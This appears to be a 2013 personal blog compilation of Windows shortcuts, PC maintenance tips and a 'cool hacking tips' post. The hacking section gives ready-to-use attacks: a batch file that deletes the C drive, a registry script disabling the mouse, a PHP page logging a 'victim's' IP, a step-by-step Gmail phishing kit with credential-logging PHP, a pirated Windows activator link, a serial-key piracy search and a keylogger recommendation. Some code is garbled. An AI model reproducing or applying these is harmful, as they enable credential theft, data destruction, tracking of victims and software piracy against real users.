·        Alt + PrtScn : Take a screen shot of the active Window and place it in the clipboard
·         Alt + Up Arrow : Move up one folder level in Windows Explorer (Like the Up Arrow in XP)
·         Alt + Left Arrow  : Display the previous folder
·         Alt + Right Arrow : Display the next folder
·         Shift + Insert  : CD/DVD Load CD/DVD without triggering Autoplay or Autorun
·         Shift + Delete : Permanently delete the item (rather than sending it to the Recycle Bin)
·         Shift + F6 : Cycle backward through elements in a window or dialog box
·         Shift + F10 : Access the context menu for the selected item
·         Shift + Tab : Cycle backward through elements in a window or dialog box
·         Shift + Click : Select a consecutive group of items
·         Shift + Click on a Taskbar button Launch a new instance of a program
·         Shift + Right-click on a Taskbar button Access the context menu for the selected item
·         Ctrl + A : Select all items
·         Ctrl + C : Copy the selected item
·         Ctrl + X : Cut the selected item
·         Ctrl + V : Paste the selected item
·         Ctrl + D : Delete selected item
·         Ctrl + Z : Undo an action
·         Ctrl + Y : Redo an action
·         Ctrl + N : Open a new window in Windows Explorer
·         Ctrl + W : Close current window in Windows Explorer
·         Ctrl + E : Select the Search box in the upper right corner of a window
·         Ctrl + Shift + N : Create new folder
·         Ctrl + Shift + Esc : Open the Windows Task Manager
·         Ctrl + Alt + Tab : Use arrow keys to cycle through open windows
·         Ctrl + Alt + Delete:  Access the Windows Security screen
·         Ctrl + Click Select multiple individual items
·         Ctrl + Click and drag an item Copies that item in the same folder
·         Ctrl + Shift + Click and drag an item Creates a shortcut for that item in the same folder
·         Ctrl + Tab Move forward through tabs
·         Ctrl + Shift + Tab Move backward through tabs
·         Ctrl + Shift + Click on a Taskbar button Launch a new instance of a program as an Administrator
·         Ctrl + Click on a grouped Taskbar button Cycle through the instances of a program in the group
·         F1: Display Help
·         F2 : Rename a file
·         F3 : Open Search
·         F4  : Display the Address Bar list
·         F5  : Refresh display
·         F6  : Cycle forward through elements in a window or dialog box
·         F7 : Display command history in a Command Prompt
·         F10 : Display hidden Menu Bar
·         F11 : Toggle full screen display
·         Tab Cycle forward through elements in a window or dialog box
·         PrtScn Take a screen shot of the entire screen and place it in the clipboard
·         (Application Key)
·         Access the context menu for the selected item
·         Home Move to the top of the active window
·         End Move to the bottom of the active window
·         Delete Delete the selected item
·         Backspace
·         Display the previous folder in Windows Explorer
·         Move up one folder level in Open or Save dialog box
·         Esc Close a dialog box
·         Num Lock Enabled + Plus (+) Display the contents of the selected folder
·         Num Lock Enabled + Minus (-) Collapse the selected folder
·         Num Lock Enabled + Asterisk (*) Expand all subfolders under the selected folder
·         Press Shift 5 times Turn StickyKeys on or off
·         Hold down right Shift for 8 seconds Turn FilterKeys on or off
·         Hold down Num Lock for 5 seconds Turn ToggleKeys on or off

**********************************************************

In delete folder

1. Create a Undeletable And Unrenamable Folders In Windows :
  ·       Go to Start and then Click on Run
  ·       Type cmd & hit enter (To open Command Prompt).
  ·       Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
  ·       Type D: or E: and hit enter
  ·       Type md con\ and hit enter (md - make directory)
  ·       You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  ·       Open that directory; you will see the folder created of name con.
  ·       Try to delete that folder or rename that folder windows will show the error message.
      How to delete that folder?
     It is not possible to delete that folder manually but you can delete this   

     folder by another way mentioned below.
Open Command Prompt
Type D: ( if u created this type of folder in D: drive) & hit enter
Type rd con\ (rd - remove directory)
Open that directory and the folder will not appear because it is removed.




2. Password Protect Folder without using any software:
  ·       Open Notepad and Copy code given below into it.

    cls
    @ECHO OFF
    Title sourav1up.blogspot.com
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-

    08002B30309D}" goto UNLOCK
    if NOT EXIST MyFolder goto MDMyFolder
    :CONFIRM
    echo Are you sure to lock this folder? (Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-

   08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-

    08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock Your Secure Folder
    set/p "pass=>"
    if NOT %pass%== admin goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-
   08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-

    08002B30309D}" MyFolder
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDMyFolder
    md MyFolder
    echo MyFolder created successfully
    goto End
    :End

  ·       Save the notepad file as lock.bat (.bat is must)
  ·       Now double click on lock.bat and a new folder will be created with name MyFolder
  ·       Copy all your data you want to protect in that New folder
  ·       Now double click on lock.bat and when command promp appears  Type Y and press enter.
  ·       Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
  ·       It will ask for password enter your password and done. (Default password is admin)

    To change the password replace Admin with  new password in the above code.

Some tips and tricks

1. Making Undeletable and Unrenameble  Folder in Windows.
2. Password Protect Folder without using any software.
3. How to make your PC’s faster and Well performable.
4. Contact me.











  

1. Create a Undeletable And Unrenamable Folders In Windows :
  ·       Go to Start and then Click on Run
  ·       Type cmd & hit enter (To open Command Prompt).
  ·       Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
  ·       Type D: or E: and hit enter
  ·       Type md con\ and hit enter (md - make directory)
  ·       You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  ·       Open that directory; you will see the folder created of name con.
  ·       Try to delete that folder or rename that folder windows will show the error message.
      How to delete that folder?
     It is not possible to delete that folder manually but you can delete this   

     folder by another way mentioned below.
Open Command Prompt
Type D: ( if u created this type of folder in D: drive) & hit enter
Type rd con\ (rd - remove directory)
Open that directory and the folder will not appear because it is removed.

2. Password Protect Folder without using any software:
  ·       Open Notepad and Copy code given below into it.

    cls
    @ECHO OFF
    Title sourav1up.blogspot.com
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-

    08002B30309D}" goto UNLOCK
    if NOT EXIST MyFolder goto MDMyFolder
    :CONFIRM
    echo Are you sure to lock this folder? (Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-

   08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-

    08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock Your Secure Folder
    set/p "pass=>"
    if NOT %pass%== admin goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-
   08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-

    08002B30309D}" MyFolder
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDMyFolder
    md MyFolder
    echo MyFolder created successfully
    goto End
    :End

  ·       Save the notepad file as lock.bat (.bat is must)
  ·       Now double click on lock.bat and a new folder will be created with name MyFolder
  ·       Copy all your data you want to protect in that New folder
  ·       Now double click on lock.bat and when command promp appears  Type Y and press enter.
  ·       Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
  ·       It will ask for password enter your password and done. (Default password is admin)

    To change the password replace Admin with  new password in the above code.

How To Further Secure ?
You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

3. How to make your PC’s faster and Well performable:
Well I got some mails from my friends that there system is not working properly now, that it was earlier. It take rather more time to run a program. How it can be mange ,should I reboot windows every time??
Look there is no need to reboot your OS in short term periods. Rebooting a system frequently affect the hard disk.
There are many different ways to make your pc’s performance faster then earlier performance.
Step 1:
As u all know Temporary files, or foo files (.TMP), are files created to temporarily contain information while a new file is being made. It may be destroyed by computer programs for a variety of purposes; principally when a program cannot allocate enough memory for its tasks, when the program is working on data bigger than the architecture's address space, or as a primitive form of inter-process communication.
Some programs create temporary files and then leave them behind - they do not delete them. This can happen because the program crashed or the developer of the program simply forgot to add the code needed to delete the temporary files after the program is done with them. The temporary files left behind can accumulate over time and consume a lot of disk space.
Temporary files may be deleted manually. Operating systems may clear out the temporary directory on a reboot, and they may have "cleaner" scripts that remove files if they have not been accessed in a certain amount of time. Also, memory-based systems, like tmpfs, inherently do not preserve files across a reboot.

  ·       Go to Start menu and click on RUN option.
  ·       Type %temp% .
  ·       There you see lots of temp files stored, which acts as a bug and it occupy system space.
  ·       Delete all the files permanently.
  ·       It provides you some MB space in your hard disk.
Step 2:

  ·       Go to My Computer.
  ·       Right click on the drives you created during Partition ,like (c,d,e )
  ·       Click on the Properties of that particular drive.
  ·       You find the allocated space reserved and free in your drive, at the bottom you see
Two options placed there:
1. Compress this drive to save disk space.
2. Allow files on this  drive to have contant  indexed in addition to file property.
  ·       The both options default selected ,just remove the selection from there
Then a messege will occur like ‘You want to select for all folders and sub folders’
  ·       Click ok and then it will take a few minutes to complete the process.

It will create a huge space in your hard disk around to around 2 to 6 GB.
So what you are waiting for …..go for it !! 

Step 3:

  ·       Click on Start menu.
  ·       Go to ‘Accessories’ and select ‘System Tools’.
  ·       Click on Disk clean up and select a particular drive like (c,d,e)
  ·       There you see it complete a process in which it scans all the error system files, dumb files etc.
  ·       Follow the steps until the process not complete
Note: It didn’t clean all the files of system.It only scans and remove the dumb and error files which occupy spaces in your system.So don’t be afraid of using it.

Step 4:

  ·       Click on Start Menu.
  ·       Go to ‘Accessories’ and select ‘Disk Defragmenter .

For start this, let me explain you that what is Disk defragmenter??
Disk defragmentation describes the process of consolidating fragmented files on your computer's hard disk.Fragmentation happens to a hard disk over time as you save, change, or delete files. The changes that you save to a file are often stored at a location on the hard disk that's different from the original file. Additional changes are saved to even more locations. Over time, both the file and the hard disk itself become fragmented, and your computer slows down as it has to look in many different places to open a file.Disk Defragmenter is a tool that rearranges the data on your hard disk and reunites fragmented files so your computer can run more efficiently. In this version of Windows, Disk Defragmenter runs on a schedule so you don't have to remember to run it, although you can still run it manually or change the schedule it uses.

  ·      Now select any drive you want to defragment.
  ·      Start the process, it will take few minutes to complete the process
  ·      At the end a system report will occur that shows your system performance.

Step 5:

I think most important step to run your system smoothly and well performed.
  ·       Refresh your system while you start your PC’s.
  ·       Install a firewall on your computer.
   ·       Clear your track files using cleaner, I suggest CCleaner is the best.
   ·       Purchase or download anti-virus software.
    ·       Remove the unnecessary software permanently from your system by using Add or Remove Programs in Control Panel.
  ·       Delete emails from unknown sources. Never click on an emailed link that looks questionable.
  ·       Keep in mind that the process like Temp files cleaning or running antivirus or cleaner should be RUN in a week simultaneously.  I hope it will surly help you to make your system performance well.

Some cool hacking tips and tricks

Thursday, 18 July 2013
Some cool Hacking Tips N Tricks

.............

SOME COOL HACKING TIPS N TRICKS

Hello everyone, I Sourav Poddar here to show you some basic hacking tips n tricks. It’s my first blog on Hacking, and I hope you will appreciate it. J
Dissimilar: (Above age 8 plz)
First of all going through it friends, let me explain you what is Hacking????? Let us get some knowledge and tips n tricks. Here I have some content of hacking course. Guys, It is a part of Ethical Hacking, so don’t Harm others plzz
1. Introduction
2. Making Nameless Folder in Windows.
3. Finding Serial Key of Any Software Using Simple Google Trick.
4. Learn To Hide Files behind the Images.
5. Active and genuine any windows anytime .
6. Learn To Make Dangerous Virus In a Minute.
7. Make a virus that disable mouse.
8. change your IP less then a minute and Grab someone IP address
9. Access Save passwords in your/other PC’s.
10. Phishing Attack to access any passwords.(Gmail,FB,Yahoo,Rediff  etc.)
11. Prevent from hackers.
12. Contact us.
Different hackers/programmer/developers/authors have different views on hacking, but basically I think that Hacking is like a sudden gift that  surprise you ;) sometimes it hurt and sometimes happier.   Hackers are human like the rest of us and are, therefore, unique individuals, so an exact profile is hard to outline. The best broad description of Hackers is that all Hackers aren’t equal. Each
Hacker has Motives, Methods and Skills. But some general characteristics can help you
understand them. Not all Hackers are Antisocial, Pimple-faced Teenagers Regardless, Hackers are curious about Knowing new things, Brave to take steps and
they are often very Sharp Minded.
Computer Hackers have been around for so many years. Since the Internet became widely used in the World, We have started to hear more and more about hacking.
Only a few Hackers, such as Kevin Mitnick, are well known.In a world of Black and White,
it’s easy to describe the typical Hacker. A general outline of a typical Hacker is an Antisocial, Pimple-faced Teenage boy. But the
Digital world has many types of Hackers.
Now Here I am providing you list of Top 10 hackers of world till 2012:
10. Kevin Mitnick
9. Kevin Poulsen
8. Adrian Lamo
7. Gary McKinnon
6. Robert Tappan Morris
5. John Draper
4. The Masters of Deception
    (A Group of Hackers)
3. Matthew Bevan and Richard Pryce
2. Jonathan James
1. Albert "segvec" Gonzalez

Hacker is a word that has two meanings:
• Traditionally, a Hacker is someone who likes to play with Software or Electronic Systems.
Hackers enjoy Exploring and Learning how Computer systems operate. They love discovering new ways to work electronically.
• Recently, Hacker has taken on a new meaning — someone who maliciously breaks into systems for personal gain. Technically, these criminals are Crackers as Criminal
Hackers. Crackers break into systems with malicious intentions.

Types of Hacker
Let’s see the categories of Hackers on the basis on their knowledge
Coders
The Real Hackers are the Coders, the ones who revise the methods and
create tools that are available in the market. Coders can find security holes
and weaknesses in software to create their own exploits. These Hackers can use those exploits to develop fully patched and secure systems.
Coders are the programmers who have the ability to find the unique vulnerability in existing software and to create working exploit codes.
These are the individuals with a deep understanding of the OSI Layer Model and TCP/IP stack.
Admins
Admins are the computer guys who use the tools and exploits prepared by the coders. They do not develop their own techniques,however they uses the tricks which are
already prepared by the coders. They are generally System Administration, or Computer Network Controller. Most of the Hackers and security person in this digital
world come under this category.
Admins have experience with several
operating systems, and know how to exploit
several existing vulnerabilities. A majority
of Security Consultants fall in this group and work as a part of Security team.

Script Kiddies
Next and the most dangerous class of Hackers is Script kiddies, They are the
new generation of users of computer who take advantage of the Hacker tools
and documentation available for free on the Internet but don’t have any
knowledge of what’s going on behind the scenes. They know just enough to
cause you headaches but typically are very sloppy in their actions, leaving all
sorts of digital fingerprints behind. Even though these guys are the teenage
Hackers that you hear about in the news media, they need minimum skills to carry out there attacks.

Now let’s start the fun because I think that introduction is enough to gain your interest about hacking.

2. Making Nameless Folder in Windows :
· Make a Newfolder on desktop or where ever you want.
· Right click on this newly created folder and select Rename.
· Erase the text showing "New Folder".
· Now keep Pressing Alt (i.e. alter key) and type 255. If you are on laptop then you need to enable your Num Lock and type from the highlighted number keys not from those below function keys.
· After that leave alt key and Press enter.
· Done you just created nameless folder. J

3. Finding Serial Key of Any Software Using Simple Google Trick:
   · Go to Google
   · Then type  Software Name 94FBR
   · Replace Software Name with the name of software whose serial key    
     you want to find
· Eg: To find serial key of Nero i will type Nero 94fbr
       Now press Enter and you will find serial key of software J

4. Learn To Hide Files behind the Images:
    · Select an image to be used for hiding file behind the image.
     ·Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
    ·And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
    ·  Now open cmd by going to Start > Accessories > Command Prompt and type following commands in it.

      CD DESKTOP

     ·CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
Copy /b imagename.jpg + filename.rar finalimage.jpg .
     ·Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
     ·Replace filename with name of your file you want to hide. It must be in .rar format.
    ·Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
    · Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

· Open winrar
· Now locate your image and open it or simply drag your image in 
     winrar.
· Extract the file and done J

5. Active and genuine any windows anytime:
Here I am giving you a web address, just go through the instruction and download it.
http://oxava.net/dl/windows8_Activation_All_vesions_Oxava.com.rar
J

6. Learn To Make Dangerous Virus In a Minute:
· Open Notepad and copy below code into it.
   @Echo off
   Del C:\ *.* |y
· Save this file as virus.bat (Name can be anything but .bat is must)
·  Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

7. Make a virus that disable mouse:
· Open Notepad and copy below codes
   rem ---------------------------------
  rem Disable Mouse
  set     
key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\  
  Mouclass"
  reg delete %
  reg add %key% /v Start /t REG_DWORD /d 4
  rem --------------------------------
·  Save this file as  virus.bat
·  Done you just created your virus.

8. Change your Ip in less then 1 minute and How to grab someone IP address:
· Click on "Start" in the bottom left corner of the screen.
· Click on "RUN" .
· Type in "cmd" and click OK.
·  Type "ipconfig /release" just like that, and press "enter"
·  Type "exit" and leave the prompt
  ·Right-click on "Network Places" or "My Network Places" on your desktop.
  ·Click on "properties.
·Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.
  · Right click on "Local Area Connection" and click "properties"
  ·Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  ·Click on "Use the following IP address" under the "General" tab
  ·Create an IP address (It doesn't matter what it is)
  ·Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  ·Press the "Ok" button here
  ·Hit the "Ok" button again

Now you should be back to the "Local Area Connection" screen.
  ·Right-click back on "Local Area Connection" and go to properties again.
  ·Go back to the "TCP/IP" settings
  ·This time, select "Obtain an IP address automatically"
  ·Click on "Ok"
  ·Hit "Ok" again.
  ·Now you have a New IP address.
Now I think you learn to change IP address.so,I think let start to Grab someone IP address J
      ·Copy the below codes into Notepad and save it as Grab.php (.php 
        is must).
   <?php
   $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
   $img_number = imagecreate(400,95);
   $backcolor = imagecolorallocate($img_number,10,102,153);
   $textcolor = imagecolorallocate($img_number,255,255,255);
   imagefill($img_number,0,0,$backcolor);
  $number0 = " This is Your IP/Proxy";
  $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
  $number2 = " Host/Proxy: $hostname";
  $number4 = " _________________________________";
  Imagestring($img_number,10,5,5,$number0,$textcolor);
  Imagestring($img_number,10,5,25,$number1,$textcolor);
  Imagestring($img_number,10,5,45,$number2,$textcolor);
  Imagestring($img_number,10,5,50,$number4,$textcolor);
  Imagestring($img_number,10,8,50,$number4,$textcolor);
  Imagestring($img_number,10,5,10,$number4,$textcolor);
  Imagestring($img_number,10,8,10,$number4,$textcolor);
  header("Content-type: image/png");
  imagepng($img_number);
  $file=fopen("Name-here-to-protect-the-File.txt","a");
  $file2 = "- IP joined - IP/Proxy:   $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
  fwrite($file, $file2);
  fclose($file);
?>
·Now make Free account on any of  the free web hosting sites Ripway or on  My3gb .
· Now Upload Grab.php to your web hosting site.
· Copy the link of your  uploaded file and send it to victim.
  · As soon as victim will click on your link his ip will be saved in your free web hosting site.
  · Enjoy now  you are Done !!

9. Access Save passwords in your/other PC’s:
     In this section i will talk about how keylogger can harm you in   different ways for example It can be used by your enemy or friend to get sensitive information such as your username and password, Bank credit card details, or any other activities you do on your computer.
· Example: You login in to your Facebook account from a computer in which keylogger is install then your username and password will be captured.
There are two types of keylogger hardware keylogger and software  keylogger. Software keylogger is install in your computer where as a Hardware keylogger is attached to your keyboard. Looking at below images will clear your mind. Now I hope you all might understand what I want to say so, Just Install any keylogger and enjy  but through my option Award Keylogger is d best J

10. Phishing Attack to access any passwords.
(Gmail,FB,Yahoo,Rediff/Hotmail/orkut etc):
  Phishing is one of the type of hacking . It is a method of acquiring sensitive information such as username, password, bank information etc. Phishing page could be safe as an duplicate page of real one. Its look exactly similar as the real page.But when user enter sensitive information on such phishing page his information is send to the E-mail address provided in the phishing page or you can say the one who created that phishing page. Phishing page is mostly send via mail. Target of phishing are mostly social networking sites like facebook, orkut etc. Also Banks website to acquire credit card details,website like yahoo, gmail are also target of phishing.

Example of Phishing scams:
· Email asking you to login to your locked account to unlock it.
· Email carrying a Link to sites like Facebook,yahoo etc and asking  
   you to Login.
·  Emails containing some Information of your Interest and asking
    you to Login to Your Account.
So here we go:
A small example of phishing:
Example1:
If you want to access any one password from any social site  and if it is found in login page at password box like this:
·······
Then just right click on that dot format and find the inspect element of that area.
(Inspect Element provides the page source codes in HTML format)
There u find
    <input id="Passwd" type="password" name="Passwd"></input>
    Now click on " type="password" and write  the "text" in place of   "password".
    Then you see on the login page that password will appear in Text 
    format.
    Enjy J 

Example 2:
This time website fun :
In this operation,You can easily edit any website in your own way,but it’s temporary just for fun
1.open any website of your choice
2.Now remove the address and copy paste this JavaScript over address bar
javascript:document.body.contentEditable='true';document.designMode='on';void 0
3. Now do whatever you want to do with that website.
Example 3:
So for before going to mail phishing, let me suggest you one thing that it works for a limited time because the mail sites enhances their security level from time to time .so,here we go:
I think everyone wants to hack gmail,yahoo mail,facebook,orkut n other social sites.Let me explain you one thing before I am going to start this trick that try at your own risk .
1. Create an account in any free web hosting site.I recommend http://www.5gbfree.com.
2. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.u can use it for any social sites but I am just taking a popular example (gmail)
3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.
5. <?php // This marks the beginning of the PHP script.
Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2 “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending
data. Which in this case is your username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;
?> // Marks the end of the PHP program.

So far you should see the following in your folder:

Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.
6. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”.

7. This will highlight the first occurrence of the word “action” in the script and you should see the following:

There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:

Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.

8.Save and close the file.
Next the hacker would upload the files up to a free webhost that  supports PHP. With a simple Google search you can come up with a  bunch that fall under this category.

Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “http://www.5gbfree.com.”.

9.Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.

10. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.5gbfree.com.. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:

Don’t forget to say thank after you hack it .

11. Prevent from hackers:
· don’t  share your passwords from any one either  your boyfriend or girlfriend.
·Always sign out from your account when you used it,because sometime spam attack in your account and it easily hack your password.
·Turn off your home sharing option when you are not using it.
·Clear your track files using  cleaner,I suggest CCleaner is the best.
·Install a firewall on your computer.
·Change your passwords every month.
·Purchase or download anti-virus software.
·Delete emails from unknown sources. Never click on an emailed link that looks questionable.